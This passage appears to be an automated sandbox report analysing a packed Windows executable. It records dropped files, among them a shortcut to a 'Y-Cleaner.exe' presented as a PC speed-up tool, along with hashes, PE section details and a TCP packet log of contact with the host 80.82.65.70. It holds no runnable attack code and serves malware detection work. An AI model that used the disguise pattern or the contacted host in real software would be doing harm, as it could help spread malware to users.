                                          SSDEEP:48:8Oy3R9gmR5aINvNm8Q98CZI1q86nxenx0yF:8rB9zHRN1zJC4qy
                                          MD5:158C73F2FC4A39F7B7EF3DDE38AC8736
                                          SHA1:05F172DEC9E34D9867E2F8E0279A0093C12550B0
                                          SHA-256:EC18A4B32E9D874D99D3D577DCC938D41183C45EC8196B2C4D799403DDA0A7CC
                                          SHA-512:6B79252671E0A65B39AA8622E33492640F53F80310FD25ED748A864B5384A88AED89AD754ABF6CAED5BA7756DD18C1B7AA24BF2DE5C8E8667E26C723756EAD88
                                          Malicious:false
                                          Preview:L..................F.@.. ...%...1M..%...1M..%...1M..........................>.:..DG..Yr?.D..U..k0.&...&......vk.v.....R2.1M..M6..1M......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yj<...........................%..A.p.p.D.a.t.a...B.P.1......Yh<..Local.<......CW.^.Yj<....b.......................G.L.o.c.a.l.....N.1......Yk<..Temp..:......CW.^.Yk<....l.....................c.+.T.e.m.p.....z.1......Y.<..ES3YF5~1..b......Y.<.Y.<....s........................e.s.3.Y.f.5.Z.W.r.K.d.S.0.d.D.s.0.W.N.3.J.z.E.N.....h.2......Y.< .Y-CLEA~1.EXE..L......Y.<.Y.<...........................?..Y.-.C.l.e.a.n.e.r...e.x.e.......w...............-.......v............!......C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.<.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.s.3.Y.f.5.Z.W.r.K.d.S.0.d.D.s.0.W.N.3.J.z.E.N.\.Y.-.C.l.e.a.n.e.r...e.x.e.H.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.465248075694765
                                          Encrypted:false
                                          SSDEEP:6144:4IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbj:tXD94+WlLZMM6YFH1+j
                                          MD5:654903FE401DE7279DF3BA9984C19C0D
                                          SHA1:01A869D83896A30D0B1BA7FB7963E188A3583AEF
                                          SHA-256:E4E9C82678A96F68D384E95D6A6EAE5EB4B1BCB0CCF5BFF58E4CF3653777DC1E
                                          SHA-512:454B52728F5448CBFB838A59434184EB4544B9D4317E33DD0CAF3E51CA2D56B922AD69EB8C185C3CEA68E1FE885E9B5E7C78A58BE0EBE82FC636D31634EE9086
                                          Malicious:false
                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmf...1M...............................................................................................................................................................................................................................................................................................................................................5..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.933074694236434
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:1'979'904 bytes
                                          MD5:cfc94b958cba743ed8b273401e37c465
                                          SHA1:6abb6112d7bcee3f5ca9837ad3f0a0016267fc63
                                          SHA256:501c477f13b6aef38fa11de85507a55863f99d0cde075879c9c6eab4cf11572f
                                          SHA512:a9bbb29948a22e51a023119b62995408f841681e0dcb857afc26dd8dc4c1cc8ac2d108f2f81dd385c9b217c60d254f4eec7491b38023e8c90f37339768dedf30
                                          SSDEEP:49152:FEc6qOISMFooEBNbOMOIbg1Ue01DnVYf1BcKo:FEcaDNbjX5e0Nnc1Bf
                                          TLSH:FE953376F8ECEABCD58283FBCD6194F5422995A5823C33632294CF9EF471B12C785249
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................

                                          File Icon

                                          Icon Hash:c7a99a8aa651798c

                                          Static PE Info

                                          General

                                          Entrypoint:0xc72000
                                          Entrypoint Section:.taggant
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                          Entrypoint Preview

                                          Instruction
                                          jmp 00007FEEE089727Ah
                                          unpcklps xmm3, dqword ptr [esi]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add cl, ch
                                          add byte ptr [eax], ah
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Rich Headers

                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x42105a0x6e.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40e0000x12168.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x8654740x18dinlulrd
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          0x10000x40d0000x254008863cffe894d42f5eb4b13144cf0a349unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x40e0000x121680x940023ea90a6525d95abd5b37ad29b0a59fcFalse0.9628378378378378data7.893094334653105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata 0x4210000x10000x200de906030ab088402d586a76aa6666758False0.15234375data1.0884795995201089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          0x4220000x29d0000x2005c2fa8081470e72ab4fa233694fa56b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          dinlulrd0x6bf0000x1b20000x1b140036baa7538d13d6e21d41aaf7bfd318eeFalse0.9848483482400462data7.940454687129734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          jiwmyjir0x8710000x10000x400aabcba12d60f12192dd06b9794eb3405False0.76953125data6.089900433281385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .taggant0x8720000x30000x22006a47c443547705c94360f7d5933983b9False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_CURSOR0x40e7300x130data1.0361842105263157
                                          RT_CURSOR0x40e8600x25a8data1.0011410788381743
                                          RT_CURSOR0x410e080xea8data1.0029317697228144
                                          RT_ICON0x8654d40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SyriacSyriac0.3648720682302772
                                          RT_ICON0x86637c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SyriacSyriac0.5063176895306859
                                          RT_ICON0x866c240x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SyriacSyriac0.5881336405529954
                                          RT_ICON0x8672ec0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SyriacSyriac0.619942196531792
                                          RT_ICON0x8678540x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SyriacSyriac0.3574108818011257
                                          RT_ICON0x8688fc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SyriacSyriac0.3536885245901639
                                          RT_ICON0x8692840x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SyriacSyriac0.40425531914893614
                                          RT_ICON0x8696ec0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSyriacSyriac0.7969083155650319
                                          RT_ICON0x86a5940x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSyriacSyriac0.8032490974729242
                                          RT_ICON0x86ae3c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSyriacSyriac0.7350230414746544
                                          RT_ICON0x86b5040x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSyriacSyriac0.7774566473988439
                                          RT_ICON0x86ba6c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SyriacSyriac0.6827800829875519
                                          RT_ICON0x86e0140x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SyriacSyriac0.7293621013133208
                                          RT_ICON0x86f0bc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SyriacSyriac0.7594262295081967
                                          RT_ICON0x86fa440x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SyriacSyriac0.8111702127659575
                                          RT_DIALOG0x41c6880x84empty0
                                          RT_STRING0x41c70c0x4beempty0
                                          RT_STRING0x41cbcc0xc4empty0
                                          RT_STRING0x41cc900x732empty0
                                          RT_STRING0x41d3c40x7bcempty0
                                          RT_STRING0x41db800x5f0empty0
                                          RT_STRING0x41e1700x696empty0
                                          RT_STRING0x41e8080x7c0empty0
                                          RT_STRING0x41efc80x76aempty0
                                          RT_STRING0x41f7340x610empty0
                                          RT_GROUP_CURSOR0x41fd440x22empty0
                                          RT_GROUP_CURSOR0x41fd680x14empty0
                                          RT_GROUP_ICON0x86feac0x76dataSyriacSyriac0.6779661016949152
                                          RT_GROUP_ICON0x86ff220x68dataSyriacSyriac0.7115384615384616
                                          RT_VERSION0x86ff8a0x1b8COM executable for DOS0.5704545454545454
                                          RT_MANIFEST0x8701420x152ASCII text, with CRLF line terminators0.6479289940828402

                                          Imports

                                          DLLImport
                                          kernel32.dlllstrcpy

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          SyriacSyriac

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 13, 2024 08:35:55.233665943 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:55.353471041 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:55.353590012 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:55.353899002 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:55.473617077 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:56.728916883 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:56.729013920 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:56.743645906 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:56.863509893 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.217278957 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.217344046 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.228630066 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.348503113 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802604914 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802695036 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802711964 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802726984 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802742004 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802742958 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.802742958 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.802757025 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802772999 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802783012 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.802783012 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.802824020 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.802824020 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.802891016 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.802988052 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.810942888 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.811008930 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.811050892 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.811050892 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.819436073 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.819466114 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.819603920 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.822675943 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.994039059 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.994102001 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.994249105 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.996328115 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.996398926 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:57.996422052 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:57.998229027 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.004592896 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.004656076 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.004717112 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.004959106 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.012693882 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.012761116 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.012806892 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.013679028 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.020879030 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.020962954 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.021006107 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.021006107 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.029083967 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.029129028 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.029159069 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.029481888 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.037250042 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.037298918 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.037312984 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.037508965 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.045422077 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.045490026 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.045531034 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.045531034 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.053654909 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.053828001 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.053829908 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.054253101 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.061775923 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.061852932 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.061907053 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.062226057 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.069942951 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.070049047 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.070143938 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.070228100 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.078152895 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.078295946 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.078345060 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.078345060 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.114250898 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.114437103 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.185897112 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.185926914 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.185971975 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.186142921 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.189143896 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.189215899 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.190268993 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.190325022 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.190334082 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.190478086 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.197055101 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.197098017 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.197134972 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.197156906 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.203461885 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.203541040 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.203546047 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.203598022 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.209873915 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.209971905 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.209980965 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.210045099 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.216000080 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.216099977 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.216149092 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.216202974 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.221896887 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.221960068 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.221992016 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.222229958 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.227845907 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.227960110 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.228037119 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.228420019 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.233875036 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.233937979 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.234019995 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.234078884 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.239844084 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.239882946 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.239907980 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.239929914 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.245848894 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.245980978 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.245999098 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.246073961 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.251770973 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.251854897 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.251897097 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.251897097 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.255400896 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.255489111 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.255502939 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.255939960 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.259066105 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.259129047 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.259167910 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.259274960 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.262752056 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.262815952 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.262818098 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.263331890 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.266453028 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.266496897 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.267031908 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.270071030 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.270201921 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.270214081 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.271331072 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.273782015 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.273952961 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.273996115 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.274226904 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.277455091 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.277499914 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.277540922 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.277540922 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.281160116 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.281246901 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.281279087 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.281327963 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.285005093 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.285234928 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.285284042 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.285284042 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.288369894 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.288486958 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.377732992 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.377840996 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.417710066 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:35:58.538100004 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:35:58.905780077 CET804973680.82.65.70192.168.2.4
